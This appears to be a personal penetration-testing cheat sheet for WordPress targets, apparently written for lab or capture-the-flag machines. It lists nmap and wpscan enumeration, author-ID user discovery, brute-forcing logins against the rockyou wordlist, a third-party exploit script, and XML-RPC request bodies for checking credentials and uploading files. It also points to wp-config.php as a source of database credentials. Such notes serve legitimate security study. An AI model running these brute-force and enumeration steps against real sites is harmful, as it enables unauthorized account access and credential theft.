Wordpress

web, enum, wordpress

Version #

Credentials #

Recon #

# Kickoff nmap
nmap -p80 --script http-wordpress-enum,http-wordpress-users 10.10.71.200

# Using wpscan (you can remove api token but some
# information will not be displayed)
# NOTE: wpscan may not report all vulnerabilities specially
# on plugins
wpscan --url http://10.10.10.29 --api-token {API_TOKEN}

# Similar to above but on another path
wpscan --url http://10.10.10.29/wordpress --api-token {API_TOKEN}

Interesting URL Paths #

# you may find version here
/wp-links-opml
/wp-links-opml.php
/readme.html

# uploads directory
/wp-content/uploads/YYYY/DD/FILENAME

# login
/wp-login.php

Interesting files #

# DB credentials
wp-config.php

Brute Force #

# Using nmap
map -p80 --script http-wordpress-brute 10.10.10.29

# User IDs can be extracted from here. You can use
# burp sniper intruder and generate a list of user
# id from 1 to 100 using bash for loop.
curl -s -I -X GET http://10.10.10.29/?author=1

# You can use this python script from
# https://github.com/relarizky/wpxploit
# This can take around 30 minutes to complete
# TIP: try using "admin" as username first
cd ~/data/tools/webapp/wpxploit
./exploit.py http://10.10.127.229/wordpress 5 15

# You can also use wpscan
wpscan --url http://10.10.127.229/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt
<methodCall>
  <methodName>
    wp.getUsersBlogs
  </methodName>
  <params>
    <param>
      <value>
        admin
      </value>
    </param>
    <param>
      <value>
        gansta1
      </value>
    </param>
  </params>
</methodCall>

Interesting URL Paths #

# most can be reported by wpscan
/wp-content/uploads/
/wp-admin/
/wp-admin/update-core.php
/wp-admin/upgrade.php
/install.php
/wp-cron.php

# can accept post requests if active
/xmlrpc.php

# others
/plugins
/wp-content/plugins

For xmlrpc.php, you can use burpsuite to send some POST requests like this.

POST /wordpress/xmlrpc.php HTTP/1.1
Host: 10.10.10.29
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 95

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

XML RPC calls #

# List all method calls
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Get blogs
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>

# Uploading a file
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
	<methodName>wp.uploadFile</methodName>
	<params>
		<param><value><string>1</string></value></param>
		<param><value><string>username</string></value></param>
		<param><value><string>password</string></value></param>
		<param>
			<value>
				<struct>
					<member>
						<name>name</name>
						<value><string>filename.jpg</string></value>
					</member>
					<member>
						<name>type</name>
						<value><string>mime/type</string></value>
					</member>
					<member>
						<name>bits</name>
						<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
					</member>
				</struct>
			</value>
		</param>
	</params>
</methodCall>

Themes #

Plugins #

Troubleshoting #

References #